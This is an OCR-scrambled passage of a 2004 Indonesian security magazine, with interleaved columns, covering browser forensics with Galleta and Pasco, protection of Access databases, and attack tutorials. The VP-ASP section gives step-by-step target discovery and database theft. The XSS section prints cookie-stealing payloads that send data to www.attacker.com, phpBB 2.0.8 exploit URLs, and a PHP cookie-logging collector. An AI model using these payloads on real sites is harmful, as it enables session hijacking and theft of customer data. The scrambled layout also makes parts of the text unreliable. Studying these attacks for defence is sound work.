image ke server yang berjalan pada komputer lainnya. Tool ini bisa cookies dan file index.dat yang dihasilkan oleh browser
diambil dari http://md5sa.com/downloads/rda/rda-0.2.1c.tgz
Microsoft Internet Explorer.
Pertama-tama kita buat dulu dua buah boot disk dengan memanfaatkan
dd, rawwrite, atau kalau di Windows adalah rawwrite for Windows. Salah satu prinsip dari computer forensic adalah semua me-
Image yang akan kita tulis ke floppy adalah bootfloppy.bin dan todologi analisis harus dapat terdokumentasi dengan baik,
rootfloppy.bin yang dapat diperoleh dari situs tersebut. dan repeatable, serta memiliki batas error yang masih dapat
Kemudian lakukan instalasi RDA server: diterima. Banyak dari file-file penting dalam Microsoft
tar -zxvf rda-0.2.1c.tgz Windows memiliki struktur yang tidak terdokumentasi
masuk ke direktori yang dihasilkan: dengan baik (undocumented). Pada saat ini masih sedikit
make tool open source yang dapat digunakan untuk melakukan
make install pengujian pada data file-file Microsoft.
Jalankan RDA server (tentukan sendiri letak anda ingin menyimpan
image): Tool-tool berikut bisa diperoleh pada www.foundstone.com.
rda --recv -o /root/hasil.img
Sejumlah penyelidikan forensik memerlukan rekonstruksi
dari file cookies Internet Explorer.
Lalu pada komputer yang ingin diambil image, lakukan booting
dengan kedua disk tersebut, mulai dari bootfloppy lalu rootfloppy. Galleta merupakan tool sederhana untuk analisis cookies
Tentukan alamat IP client tersebut. Kemudian jalankan RDA (arahkan Internet Explorer, sedang Pasco menganalisis file index.dat.
ke IP server):
Keduanya merupakan tool command line yang dipanggil
rda --send -r 192.168.0.1 -i /dev/hda7
dari prompt DOS.
Pada contoh di atas, image dibuat untuk partisi /dev/hda7 diarahkan
ke RDA server yang bertempat di 192.168.0.1. Contoh tampilan hasil Memeriksa File Cookies dengan Galleta
di server:
Server mode. 1. Format File Cookie IE
Start: Sat Aug 7 08:24:47 2004
65690696 bytes in. Karena HTTP merupakan stateless protocol, maka situs web
End: Sat Aug 7 08:27:23 2004 harus menempatkan informasi pada komputer user jika per-
65769472 bytes read
65769472 bytes wrote
lu menyimpan informasi mengenai suatu web session.
65769472 bytes reported by client. Misal, saat user memilih sesuatu barang dan menambahkan-
156 seconds - 411.00 Kbytes / sec nya ke shopping cart, informasi tersebut bisa disimpan pada
[root@warcraft root]# ls -l hasil.img
-rw-r--r-- 1 root root 65769472 Aug 7 08:27 hasil.img komputer client ketimbang pada web server. Fasilitas untuk
Tool ini juga mampu melakukan skip error pembacaan, semacam bad menyimpan informasi dengan cara seperti ini dikenal seba-
block, dan mengganti dengan 0, serta mencatat posisinya. Output gai cookie. Cookie adalah suatu ‘file kecil’ yang memuat data
hasil image bisa juga ditulis ke suatu disk /partisi (untuk keperluan yang ditempatkan web server pada komputer user, yang
penggandaan disk), dan dapat dipotong (span) ke sejumlah file. nantinya bisa diambil kembali oleh server.
Untuk mengetahui option yang ada bisa anda baca manual RDA
dengan man rda atau rda -h. Selama analisis forensic informasi dalam file cookie IE di-
Misal untuk melakukan copy hard disk jarak jauh (hard disk harus ubah ke dalam bentuk yang lebih mudah dibaca oleh manu-
identik jenis dan ukurannya), maka pada sisi server dilakukan: sia. Analisis Cookies memberikan gambaran mengenai
rda --recv -o /dev/hdc aktivitas internet yang dicurigai.
Penulisan akan dilakukan mulai dari sector 0 (MBR), ini akan jadi
semacam remote disk duplication.
File cookies biasanya terletak pada:
? Untuk Windows 2000/XP:
C:\Documents and Settings\<username>\Cookies
? Untuk Windows 95/98/ME:
C:\Windows\Cookies

34 NeoTek Vol. IV No. 09


NeoTutor

COMPUTER FORENSICS
Analisa Forensik Pemakaian IE
Perilaku browsing anda dapat diintip meskipun anda sudah berusaha menghapus file History
dari Internet Explorer anda. Ini dikarenakan adanya pemeriksa cookie yang dinamakan Galleta dan
pemeriksa index.dat yang dinamakan Pasco. Masih ada lagi software serupa yang khusus untuk
admin jaringan atau penegak hukum: IE History Viewer.
Perhatikan, file tersebut berada dalam format ASCII, sehing-
ga orang bisa membaca isinya dengan mudah. Kita akan lihat
setiap barisnya:
1: memuat nama variabel, pada contoh ini variabel
bernama B
2: memuat nilai variabel tersebut, pada contoh ini
variabel B memiliki nilai cvps1et0cgut6&b=2
3: situs web yang mengeluarkan cookie, pada contoh ini
adalah yahoo.com
4: flag, pada contoh ini adalah nol.
Gambar 1. Letak cookies pada Windows 98 5 - 6 : expired time untuk cookie, yaitu masa kadaluwarsa
sehingga cookies tidak valid lagi. Waktu tersebut
dipisahkan dalam 2 integer: most significant integer
lalu least significant integer.
7 - 8: creation time, waktu pembuatan cookie
9: selalu memuat * sebagai delimiter bila file teks
tersebut memuat lebih dari satu cookie. Ingat dalam
satu file cookies bisa terdapat lebih dari satu variabel
cookies.
Bisa diringkaskan dalam tabel berikut:
Baris Keterangan
1 Nama variabel
2 Nilai variabel
3 Situs web asal cookies
4 Optional flag
5 most significant integer untuk expired time
6 least significant integer untuk expired time
7 most significant integer untuk creation time
8 least significant integer untuk creation time
9 Cookie Record Delimiter (karakter *)
Gambar 2. Letak cookies pada Windows 2000 Kalau anda lihat memang format waktu yang nampak cukup
susah dibaca, karena berada dalam format FILETIME
Windows. Tetapi dengan tool galleta, format tersebut akan
Setelah mengunjungi suatu situs web seperti misalnya situs dikonversi menjadi bentuk yang lebih mudah kita baca.
www.yahoo.com suatu cookie akan dibangkitkan pada kom-
puter user yang isinya semacam contoh berikut (dari file 2. Menggunakan Galleta
cookies maulana@yahoo[2].txt):
Galleta, dari bahasa Spanyol yang bermakna ‘cookie’, dikem-
B bangkan untuk melakukan pemeriksan isi dari file cookie.
cvps1et0cgut6&b=2
yahoo.com/ Galleta akan melakukan parsing informasi dalam suatu file
0 cookie dan menampilkan hasilnya dalam bentuk field-field
985407488 yang bisa di-import ke program spreadsheet semacam Excel.
30072022 Galleta tersedia pada sejumlah platform Windows (dengan
2156856480 Cygwin), Mac OS X, Linux, dan BSD.
29642495 Sintaksnya:
*
galleta [options] <nama_file_cookies>
Pada contoh ini kita hanya mengambil sampai dengan baris
kesembilan. Cookie ini mengandung informasi yang disim- dengan options adalah (bisa dibiarkan kosong)
pan oleh client dari web server, nama domain yang bertang- -t Field Delimiter (default delimiternya adalah TAB, bila
gungjawab pada cookies ini, dan time/date stamp. tidak ditentukan user)

Vol. IV No. 09 NeoTek 35


NeoTutor

Contoh: Internet Files\Content.IE5\


E:\galleta>galleta c:\windows\cookies\maulana@yahoo[2].txt ? \Winnt\Profiles\<username>\Cookies\
Cookie File: c:\windows\cookies\maulana@yahoo[2].txt ? \Winnt\Profiles\<username>\Local
Settings\History\History.IE5\
SITE VARIABLE VALUE CREATION TIME EXPIRE TIME FLAGS
yahoo.com/ B cvps1et0cgut6&b=2 Thu Jun 10 15:27:55 2004 Thu Apr 3. Windows 2K/XP
15 20:00:00 2010 0
yahoo.com/ Q q1=AACAAAAAAAAAcw--&q2=QNwiQQ-- Fri Jun 25 18:23:45 2004 ? \Documents and Settings\<username>\Local
Wed Jun 25 18:23:45 2014 0 Settings\Temporary Internet Files\Content.IE5\
? \Documents and Settings\<username>\Cookies\
Untuk memudahkan anda memeriksanya, lakukan pipe
output-nya ke suatu file teks, sehingga perintahnya menjadi ? \Document and Settings\<username>\Local
seperti: Settings\History\History.IE5\
Untuk memudahkan anda bisa mencarinya dengan meman-
E:\galleta>galleta c:\windows\cookies\maulana@yahoo[2].txt
> periksacookie.txt faatkan fasilitas Find File dari Windows Explorer.
Lalu anda bisa salin file index.dat itu ke tempat lain, karena
File periksacookie.txt bisa anda edit dengan Excel untuk me-
mudahkan pemeriksaan. lebih mudah ketimbang memberikan parameter path yang
cukup panjang nantinya pada pemanggilan Pasco (misalkan
saja file terletak pada C:\WINDOWS\Temporary Internet
Files\Content.IE5).
2. Menggunakan Pasco
Bila Galleta berfokus pada cookies, maka Pasco melakukan
analisa forensik terhadap aktivitas Internet Explorer. Di sini
diperiksa data yang ditemukan pada file index.dat.
Gambar 3. Hasil output Galleta pada parse suatu file cookies

Lihatlah, sekarang anda lebih mudah memeriksa informasi


yang tersimpan pada cookies tersebut, termasuk creation
time dan expire time-nya.
Mengorek Aktivitas Berinternet dengan Pasco
1. Mengenal File index.dat
Browser Internet Explorer (IE) menyimpan file history yang
mengungkapkan situs web (atau Uniform Resource Locator
/URL) yang dikunjungi oleh user. Karena file browse history
ini ada dalam bentuk binary, maka diperlukan tool khusus
untuk memeriksanya.
Internet Explorer melakukan cache URL yang dikunjungi
user. Saat user berkunjung ke suatu situs web, IE memeriksa
apakah ia sudah pernah menyimpan (cached) suatu copy Gambar 4. Contoh pencarian index.dat pada Win'98
lokal dari situs web tersebut di dalam hard disk.
Jika copy lokal sudah ada, maka IE akan mempergunakan Pasco, dari kata latin yang berarti ‘browse,’ dikembangkan
file cache di lokal ketimbang men-download informasi ter-
untuk menguji isi dari cache Internet Explorer.
sebut dari Internet (inilah sebabnya anda dapat browsing
lebih cepat pada suatu situs yang pernah anda kunjungi di Pasco akan melakukan parsing informasi dari file index.dat
waktu lampau). dan mengeluarkan hasilnya dalam bentuk field-field yang
bisa di-import ke program spreadsheet semacam Excel.
IE menyimpan file cache dalam Temporary Internet Folders
pada hard disk. File yang dipergunakan untuk melakukan Pasco tersedia pada sejumlah platform Windows (dengan
pemetaan nama dari nama file cache dengan URL sebenar- Cygwin), Mac OS X, Linux, dan BSD.
nya adalah file index.dat. File index.dat menyimpan URL, Sintaksnya:
tanggal page web terakhir dimodifikasi oleh server, dan
tanggal URL terakhir diakses oleh user. pasco [options] <file_index.dat>
IE memiliki sejumlah file index.dat, yang ada dalam bentuk dengan options adalah (bisa dibiarkan kosong):
binary. ? -d : Undelete Activity Records
File index.dat biasanya terletak pada: ? -t Field Delimiter (default delimiter adalah TAB, bila
tidak ditentukan user)
1. Untuk Windows 95/98/Me
? \Windows\Temporary Internet Files\Content.IE5\ Contoh penggunaan (keluaran di-pipe ke file teks):
? \Windows\Cookies\ pasco c:\windows\cookies\index.dat > hasilindex.txt
? \Windows\History\History.IE5\ Nah, file hasilindex.txt merupakan file dengan field yang
2. Untuk Windows NT dipisah oleh TAB dan dapat dibuka dalam Excel untuk me-
? \Winnt\Profiles\<username>\Local Settings\Temporary
mudahkan proses lebih lanjut.

36 NeoTek Vol. IV No. 09


NeoTutor

Tool berbasis GUI tersebut tidak disebarkan untuk umum,


dan hanya dapat diperoleh para penegak hukum atau tenaga
security di perusahaan.

Gambar 5. Hasil Pasco dari file C:\windows\cookies\index.dat

Gambar 8. Tampilan Main Screen tool Internet Explorer


History Viewer (gambar dari situs www.phillipsponder.com)

Gambar 6. Hasil Pasco dari file C:\WINDOWS\Temporary


Internet Files \Content.IE5\index.dat

3. Internet Explorer History Viewer


Gambar 9. Membuka file .DAT (Internet Explorer History
Sebagai informasi tambahan, terdapat juga tool komersial File)
untuk keperluan analisis aktivitas IE, yaitu pada situs
www.phillipsponder.com.

Gambar 10. Daftar situs web yang dikunjungi dari file .DAT

Gambar 7. Situs Phillips Ponder Company

Tool Internet Explorer History Viewer tersebut dikatakan


juga dapat menangani file yang berasal dari Netscape (fat.db
untuk file cache dan Netscape.hst untuk file history), serta
recycle-bin (INFO dan INFO2). Gambar 11. Mencari informasi tertentu dari file .DAT

Vol. IV No. 09 NeoTek 37


NeoTekno

DATABASE SECURITY
Mencegah MDB Download
Firrar Utdirartatmo (firrar@lycos.com) memberikan jawaban mengenai cara mengamankan
database Microsoft Access dari usaha carder men-download-nya dari situs e-commerce
yang umumnya dilanjutkan dengan usaha meng-crack password dan
mendapatkan informasi dari dalamnya.

P
ADA NEOTEK EDISI WEB HACKING VOL. IV - NO. 05, lain; termasuk dapat diambil dari folder Temporary In-
telah dibahas tentang Comersus Shopping Cart Bug. ternet Files bila mempergunakan Internet Explorer versi 5
Bug tersebut muncul, karena carder dapat men- ke atas).
download file MS Access (memiliki ekstensi *.MDB) yang Nah, untuk menghindarinya
dipergunakan sebagai database. Pada artikel ini, penulis akan masih ada satu langkah lagi
memberikan sebuah tips sederhana untuk mencegah di- yang diperlukan. Buatlah su-
download-nya file MS Access tersebut. atu table yang tidak berkait-
Letak dan Nama File Non-Standard an dengan table-table lain-
nya (katakanlah table dummy).
Sebenarnya ada cara mudah untuk mencegah di-down-
load-nya file MS Access, yaitu dengan menyimpan file Pada table dummy tersebut,
MS Access tersebut di luar virtual directory yang diguna- buatlah sebuah field yang
kan untuk web publish, serta di luar turunan dari virtual memiliki data type Text. Per-
directory tersebut. hatikan, bahwa untuk Uni-
code Compression pilihlah
Namun, cara tersebut mungkin hanya berlaku bila kita me- Yes (pilihan ini menyebab-
masang web server sendiri (dan kalau memasang web server kan untuk sebuah karakter
sendiri, mungkin kita akan menggunakan MS SQL Server hanya diperlukan 1 byte).
bukan MS Access sebagai database-nya). Sedangkan free
web hosting serta web hosting dengan biaya murah yang Gambar 2. Datatype Text pada
Isilah field pada table
menyediakan MS Access sebagai database-nya, biasanya field dummy pada table dummy, dummy tersebut dengan
meletakkan file MS Access tersebut pada virtual directory %> %><% %><% <%.
atau turunannya. Untuk keperluan ini, maka ekstensi
Sebenarnya, agak sukar bagi carder untuk menebak nama file MS Access HARUS dikemba-
file MS Access yang dipergunakan. likan ke asalnya (*.MDB) dan sete-
lah selesai bisa diubah lagi ke eks-
Tapi, bagaimana bila aplikasi yang dipergunakan oleh situs tensi ganda (*.MDB.ASP). Hal ini
e-Commerce tersebut merupakan aplikasi open-source? Wah, disebabkan, MS Access tidak dapat
ini tentunya dapat menjadi malapetaka. mengakses file MS Access yang
Salah-satu cara yang dapat ditempuh adalah dengan segera memiliki ekstensi di luar *.MDB
Gambar 3. Mengisi dum-
mengganti nama file MS Access tersebut. my record
(sedikit aneh?).
Bila Anda ingin membuat aplikasi ASP yang open-source Memciptakan Pesan Kesalahan
dengan menggunakan file MS Access sebagai database-nya
serta tidak ingin file MS Access tersebut dapat di-download Mungkin anda bertanya, apa maksud dari isi %> %><%
oleh pihak-pihak yang tidak berkepentingan, maka Anda %><% <% ini.
dapat menggunakan tip berikut. Seperti kita ketahui, script ASP selalu memiliki delimiter,
yang untuk pembuka adalah <% dan untuk penutup adalah
Trick dengan Dummy Table %>. Bila delimiter pembuka tidak diakhiri dengan delimiter
Pertama-tama, kita tambah- penutup (begitu pula sebaliknya), maka akan di-generate su-
kan ekstensi *.ASP di bela- atu pesan kesalahan (error message) oleh web server.
kangnya, sehingga dengan
demikian file MS Access
tersebut kini memiliki eks-
tensi ganda *.MDB.ASP .
Tapi, langkah pertama ma-
sih kurang, karena orang
masih dapat men-down-
load-nya dengan aplikasi-
aplikasi untuk keperluan
download (FlashGet, Down-
load Accelerator, dan lain-

Gambar 1. Membentuk dummy


table Gambar 4. Membentuk direktori testdb untuk pengujian.

38 NeoTek Vol. IV No. 09


NeoTekno

Gambar 5. Pada folder testdb, letakkan file-file data.mdb.asp, Gambar 8. Testform1.html untuk ODBC tanpa DSN
testform.html, dan myresponse.asp

Gambar 9. Hasil testing terhadap testform1.html


Gambar 6. Pesan kesalahan yang muncul apabila ada yang
mencoba men-download file data.mdb.asp

Pesan kesalahan ini memang disengaja, sehingga saat carder


mencoba untuk men-download file MS Access tersebut de-
ngan aplikasi-aplikasi untuk keperluan download, maka yang
diperoleh adalah file yang berisi pesan kesalahan dalam for-
mat HTML.
Pada Gambar 7 disajikan pula hasil View Source dari pesan
kesalahan yang dihasilkan oleh web server.

Gambar 10. Testform2.html untuk OLEDB

Gambar 7. HTML source dari pesan kesalahan seperti yang akan


teramati oleh carder
Sample Files untuk ODBC tanpa DSN dan untuk OLEDB
Teknik ini dapat dipakai, baik untuk ODBC tanpa DSN
maupun untuk OLEDB (biasanya web hosting yang mem-
perbolehkan MS Access untuk database-nya, meminta
kepada client-nya untuk mempergunakan ODBC tanpa
DSN atau OLEDB).
Pada file yang penulis sertakan, file testform1.html dan
myresponse1.asp adalah contoh untuk ODBC tanpa DSN.
Sedangkan file testform2.html dan myresponse2.asp ada- Gambar 11. Hasil testing terhadap testform2.html
lah contoh untuk OLEDB.
Selamat mencoba...

Comersus Shopping Cart Bug


Artikel ini adalah tanggapan terhadap artikel sebelumnya dari Andi Ismayadi (Fuzk3_kendi@yahoo.com) berjudul
Web Hacking: Comersus Shopping Card Bug yang membahas cara men-download file Microsoft Access dari
shopping cart ini, kemudian meng-crack password-nya untuk mendapatkan data, termasuk nomor kartu kredit.

Vol. IV No. 09 NeoTek 39


NeoTekno

DATABASE SECURITY P
ADA EDISI SEBELUMNYA SUDAH DIBAHAS
kelemahan beberapa shopping cart
(NeoTek Vol. III No. 05, Feb/Mar
2003 dan NeoTek Vol. IV No. 05, 2004).

VP-ASP Selanjutnya pada edisi ini dibahas teknik


Mencegah MDB Download.

SHOPPING CART
Untuk semakin melengkapinya, kali ini
penulis mengangkat kelemahan shopping
cart pada VP-ASP.
Alasan mengangkat topik ini adalah kaitan
eratnya dengan database security, yang
dalam hal ini VP-ASP shopping cart me-
miliki database yang dikemas dalam ben-
Melengkapi artikel tentang cara mencegah MDB Download, tuk file MDB.
MA Rody Candera (odyxb@bogor.net) melengkapi dengan Rincian yang dibahas dalam majalah ini
bahasan mengenai kelemahan VP-ASP Shopping Cart bertujuan untuk menambah pengetahuan
para pembaca mengenai e-commerce
dalam melindungi databasenya yang dikemas dalam bentuk security dan bukan untuk melakukan
file MDB (Microsoft Database). tindakan yang melanggar hukum.

KEYWORD ALUR TARGET SHOPDBTEST


1 kata kunci menjadi penting ketika
digunakan pada search engine
2 Ada halnya hasil search engine tidak
berhubungan dengan apa yang kita
3 Sesuai dengan alur target, cari dari
hasil search engine yang sesuai
untuk mendapatkan target. Untuk inginkan, untuk itu situs yang akan dengan kebutuhan. Masukkan
shopping cart VP-ASP, kata kunci menjadi target memiliki alur pada alamat target pada bagian address
yang digunakan yaitu URL-nya. Alurnya adalah: bar dan perlu diperhatikan
shopdisplaycategories. Masukkan kata domain_target/dir/shopdisplaycategori shopdisplaycategories.asp diganti
kunci tersebut pada input box es.asp dengan shopdbtest.asp
search engine.

XDATABASE .MDB DOWNLOAD


4 Eksekusi dari alur pada langkah 3
akan menuju sebuah halaman yang
5 Langkah selanjutnya adalah
menggunakan nama file database
6 Eksekusi dari alur pada langkah 5
akan menyebabkan file database yang
merupakan bagian dari halaman situs tersebut yang dimasukkan pada dimiliki oleh situs yang menjadi target
target yang berisi nama database yang address bar mengganti posisi memunculkan menu File Download ,
digunakan, perhatikan pada baris shopdbtest.asp dan tambahkan .mdb artinya pencurian data telah terjadi.
xDatabase. Pada situs yang menjadi di bagian akhir. Pelaku dapat mengetahui isi databse
target memiliki database yang diberi tersebut untuk melakukan tindakan
nama shopping400. berikutnya.

40 NeoTek Vol. IV No. 09


NeoTekno

WEB SECURITY
Memahami (Penyalahgunaan) XSS
Cross Site Scripting yang lebih dikenal sebagai XSS menjadi semakin terkenal dengan adanya
kasus ‘Hacker KPU’ yang memanfaatkan XSS yang dikombinasikan dengan SQL Injection.
MA Rody Candera (odyxb@bogor.net) membahas apa sebenarnya yang ingin dicapai
oleh XSS dan bagaimana akhirnya dapat disalahgunakan.
XSS: URL Retrieval
X
SS MERUPAKAN SINGKATAN DARI CROSS SITE SCRIPTING.
Berhubungan dengan aplikasi keamanan web, XSS URL Retrieval yang paling dekat kita kenal yaitu pada apli-
adalah satu metode serangan yang justru tidak kasi webmail seperti Yahoo! maupun Hotmail. Pada saat kita
menghasilkan sebuah akses sistem atau root dari suatu web akan mengakses account email yang mengharuskan log-in
server walaupun serangan dilakukan secara langsung. Inti- terlebih dulu dan ketika log-in dinyatakan sukses, kita men-
nya, serangan ini adalah sebuah tindakan yang dilakukan dapatkan session ID, yang dapat dilihat pada address box.
untuk mendapatkan informasi yang berkaitan erat dengan
aplikasi web. Contoh ID Session pada saat log-on:
Untuk memahami XSS, dibutuhkan penguasaan HTML aktif http://www.domain.com/home.cgi?id=665Y3eF7Tq
seperti JavaScript, Visual Basic Script, dan termasuk didalam- Pada awalnya kebanyakan Session ID yang ditentukan oleh
nya penguasaan akan HTML itu sendiri sebagai bagian webmail tidak bersifat random, sehingga pada sesi lainnya
utama dalam XSS. masih tetap menggunakan Session ID yang sama.
Jadi XSS merupakan kemampuan dalam melakukan injeksi http://www.domain.com/inbox.cgi?id=665Y3eF7Tq
dengan menggunakan HTML tag yang dikombinasikan
dengan JavaScript maupun VBScript yang kemudian dima- Hal tersebut dimanfaatkan oleh pihak yang tidak bertanggung
sukkan kedalam sebuah aplikasi web. Ada banyak bentuk jawab untuk mencoba masuk pada dengan Session ID tersebut.
aplikasi web, antara lainnya yaitu webmail, online forum, Sekarang ini, baik Yahoo! maupun Hotmail menggunakan
dan e-shopping. session ID yang bersifat random.
XSS hadir disaat adanya tuntutan untuk menciptakan web Sebagai contoh dasar penggunaan XSS
yang dinamis atau membuat web yang indah dipandang lihat <script>alert("Hello");</script>
mata dengan fitur-fitur yang dianggap dapat memberikan yang jika kita menerima email yng berisi
daya tarik tersendiri, tetapi luput dari pengamatan akan script tersebut maka script tersebut akan
masalah keamanannya. diinterpretasikan oleh browser (jika web-
Sebagai contoh yang dapat dipetik yaitu menyediakan fitur mail vulnerable terhadap cross site script- Gambar 2. Hello

guestbook pada web. Kurangnya memperhatikan validasi ing) dan akan muncul message box pada
atas illegal input yang layar.
mungkin saja bisa dila-
kukan oleh seseorang
dengan menyisipkan mali-
cious code dapat menjadi
sebuah ancaman.
Sekali saja penggunaan
JavaScript, maka pengun-
jung web yang lainnya
yang mengakses situs
tersebut dapat menjadi
korban karena telah meng-
eksekusi script yang disi-
sipkan di guestbook ter-
sebut tanpa disadari. Ba-
haya yang terjadi bisa saja
data yang terdapat dalam
hardisk korban dihapus
karena JavaScript mampu
melakukan hal itu.

Gambar 1. YahooMail URL


Retrieval

Vol. IV No. 09 NeoTek 41


NeoTekno

Dari contoh tersebut di atas, dapat dikembangkan sehingga <script>alert(document.cookie);</script>


menampilkan message box URL Retrieval dengan Jadi dengan script:
menyusupkan <script>alert(document.location);</script>
<script>document.write("<img
Ini memberikan ide-ide selanjutnya dalam melakukan XSS src=http://www.attacker.com/?url=" +
sehingga dapat melakukan access hijacking. document.location + "&cookie=" + document.cookie +
">");</script>
seorang attacker dapat mengakses cookie dari komputer
korban dan informasi itu nantinya oleh attacker dapat
mengakses account yang dimiliki oleh korban tersebut.
XSS: HTML Form
Ada hal lain
yang dapat
menjadi jalan
Gambar 3. URL Retrieval alert bagi attacker
untuk dapat
menggunakan
Kedua contoh yang di atas memunculkan message box di metode XSS,
layar sasaran. Lalu bagaimana attacker mendapatkan infor- yaitu lewat
masi tersebut? HTML Form.
Perhatikan script document.write(text); Script ini yang di- Pembuatan
gunakan yang nantinya URL Retrieval yang disertai ID form yang
Session akan dikirmkan ke attacker. Attacker perlu menyiap- lemah dapat
kan media untuk menerima overan data tersebut seperti mengakibat-
misalnya sebuah situs. kan disusup-
<script>document.write("img Gambar 6. HTML form
kannya mali-
src=http://www.attacker.com/?a=" +
cious code
document.location + ">");</script>
pada form ini
oleh attacker.
dengan melakukan request terhadap file image pada sebuah
situs penampung dan file tersebut sebenarny tidak ada, jadi Dari bentuk form yang diperlihatkan pada Gambar 6, XSS
dengan melakukan ricek pada access log files maka akan me- dapat digunakan untuk menyusupkan malicious code yang
lihat URL dari korban yang berisi Session ID. dengan menggunakan form method="GET" dapat mem-
buat script yang disusupkan langsung di-submit.

Gambar 7. HTML code


Dengan memasukkan script berikut ini, maka XSS sudah
Gambar 4. Log file cek dapat dijalankan dan data yang disertakan akan secara lang-
sung di submit oleh CGI script.
XSS: Cookies
document.form.submitform.firstname.value = "Bedjoe";
Tujuan penggunaan cookie sebenarnya document.form.submitform.lastname.value = "Jarwoe";
untuk mempermudah identifikasi yang document.form.submitform.email.value =
dilakukan oleh suatu situs yang meng- "bedjoe@jarwoe.com";
gunakan sistem log-on terhadap usernya document.form.submitform.submit();
yang banyak.
Gambar 5.
Sebagai bagian dari aplikasi web yang JavaScript cookie
dinamis, cookie biasanya difungsikan
untuk menempatkan identitas user untuk keperluan otenti-
fikasi atau otorisasi untuk username token dan password
token dan kedua token tersebut selanjutnya direkam dalam
cookie.
Berdasarkan deskripsi pada XSS: URL Retrieval, XSS
dapat ditujukan kepada cookie dan memiliki tingkat risiko
yang sama besarnya. Sebuah cookie dapat diakses dengan
menggunakan JavaScript yaitu document.cookie dan un-
tuk menampilkan cookie pada screen dengan mengguna-
kan JavaScript yaitu: Gambar 8. XSS HTML form

42 NeoTek Vol. IV No. 09


NeoTekno

XSS Development: Hotmail Vulnerability phpBB versi 2.0.8 yang diinformasikan pada tanggal 22
Metode XSS makin hari terus berkembang, ini dapat di- Juli 2004 dimana vulnerabilities tersebut ditemukan oleh
Janek Vind.
lihat dari informasi yang memberitakan mengenai vul-
nerable terhadap sistem aplikasi web dan info yang ter- Catatan: NeoTek Vol. III - No. 06, Mar/Apr 2003, Dani
baru yaitu pada webmail Hotmail vulnerable terhadap Firmansyah pernah membahas mengenai teknik menjebol
XSS (Jul 22 2004). phpBB 2.0.0
Berikut dibawah merupakan bentuk exploit XSS yang
URL Retrieval:
ditemukan pada phpBB 2.0.8
<!--><img
src="javascript:window.location='http://www.google.co
Cookies:
m'"><!--> http://www.target.com/phpbb208/index.php?category_row
s[0][cat_id]=1&category_rows[0][cat_title]=waraxe<scr
script tersebut akan membuat auto redirect ke situs
ipt>alert(document.cookie);</script>&category_rows[0]
www.google.com dan pada address bar akan terlihat :
[cat_order]=99
http://by5fd.bay5.hotmail.msn.com/cgi-
http://www.target.com/phpbb208/faq.php?faq[0][0]=f00<
bin/compose?type=r&curmbox=foobar&a=foobar&msg=foobar
script>alert(document.cookie);</script>bar&faq[0][1]=
&start=foobar&len=foobar&curmbox=F000000001&a=foobar
waraxe
Cookies:
http://www.target.com/phpbb208/faq.php?mode=bbcode&fa
<!--><img q[0][0]=f00<script>alert(document.cookie);</script>ba
src="javascript:window.location='http://www.attacker. r&faq[0][1]=waraxe
com/log.php?email=victimsaddress@hotmail.com&cookie='
Vulnerabilities pada web aplikasi di Hotmail dan phpBB
+ document.cookie"><!-->
adalah sebagian dari bentuk kemampuan XSS menjadi
dalam hal ini cookie ditampung dengan menggunakan file alat dalam menembus securitas dari suatu sistem. Banyak
*.php dan berikut script php yang digunakan dapat dilihat di informasikan di Internet mengenai keampuhan XSS
pada Box 1. sebagai hal yang patut untuk diwaspadai.
Ini hanya satu bukti jika metode XSS makin berkembang Berikut beberapa info mengenai vulnerabilities web
dan banyak sebenarnya informasi mengenai system yang aplikasi terhadap XSS:
vulnerable terhadap serangnya yang menggunakan metode
XSS dan itu dapat anda jumpai di situs-situs underground. XSS Vulnerability in Phpgroupware
Juli 4 2003
Bagi yang berminat mengenal bagaimana secara teknis
kejadiannya situs KPU dapat di-hack menggunakan XSS msn.com XSS vulnerability
vulnerability dikombinasikan dengan SQL injection, dapat May 13 2003
melihat laporan detikcom yang dapat diakses lewat berbagai XSS Vulnerability in NOKIA Official Website
situs, seperti misalnya di sini: Jan 20 2003
http://students.stttelkom.ac.id/news/?op=view&id=105 XSS Vulnerability Found in Apple Web Site
http://www.bhinneka.com/Independent/Thepost/postScript/ Jan 5 2003
?nid=PN00000561 XSS Vulnerability Found in Cisco Website
Bukti lainnya mengenai keampuhan XSS dalam mengeks- Dec 18 2002
ploitasi kelemahan akan sistem aplikasi web terjadi pada

BOX 1.
<?php
$file="youpasswordlog.log";
if (isset($HTTP_GET_VARS["cookie"]) && isset($HTTP_GET_VARS["email"]){

$logcookie = $HTTP_GET_VARS["cookie"];
$logcookie = rawurldecode($logcookie); //turns url encoding to normal text
$logemail = $HTTP_GET_VARS["email"];
$logemail = rawurldecode($logemail); //turns url encoding to normal text

$handle=fopen($file, "r+"); //Opening the file in read only


$filecontence=fread($handle,filesize("$file"));
fclose($handle);

$handle=fopen($file, "w"); //Opening the file for writing


fwrite($handle, "$logemail - $logcookie\n $filecontence\n ");
//Writing email address and cookie then the rest of the log
fclose($handle);
}
header("Location: http://www.hotmail.com");
?>

Vol. IV No. 09 NeoTek 43


NeoTekno

Biometrics: Security berdasarkan Karekteristik Biologis dan Tingkah Laku

BIOMETRICS IT PRODUCTS
K ETIKA ADA KEBUTUHAN MENGENAI KEAMANAN, MUNCUL
tawaran sistem pengamanan dengan menggunakan
Berkaitan dengan teknologi biometrics untuk tujuan sis-
autentifikasi PIN (Personal Identified Number) dan pass- tem pengamanan, saat ini sudah lumayan ramai hadir
word. PIN bukanlah hal yang baru; anda sebagai peme-
produk-produk yang berhubungan dengan komputer di-
gang kartu ATM mungkin selalu berkutat dengan hal itu. lengkapi dengan teknologi biometrics. Pada umumnya
Begitu juga password yang merupakan otentifikasi yang
teknologi biometrics yang digunakan masih berkutat pada
digunakan seperti pada mail account. fingerprint (sidik jari).
Seiring dengan kemajuan jaman, sebagaimana yang kita
ketahui, tingkat kriminalitas juga menuju era kemajuan Flash Drive
sehingga dirasakan tawaran sistem keamanan dengan Sony. Perusahaan yang dikenal inovatif dengan hasil cip-
menggunakan PIN dan password tidak lagi mampu mem- taannya yang sering me -
berikan rasa nyaman. Muncul tantangan baru untuk men- ngejutkan, ikut ambil ba-
jawab keresahan itu. gian untuk pengembang-
an flash drive yang di-
lengkapi dengan teknologi
Biometric dan diberi nama
Sony Puppy.
Ritech International. Per-
usahaan yang bermarkas di
Hong Kong ini mungkin ti-
dak terlalu berkibar nama-
nya di Indonesia tetapi per-
usahaan ini juga menge-
luarkan produk flash drive
yang diberi nama BioSlimDisk
dengan sensor yang digu-
nakan merupakan teknologi yang dimiliki dan dikembang-
kan oleh Sony.
BioMetric features
Trek. Seperti juga Ritech Interna-
BIOMETRIC tional, Flash Drive yang diproduksi
oleh Trek juga menggunakan sen-
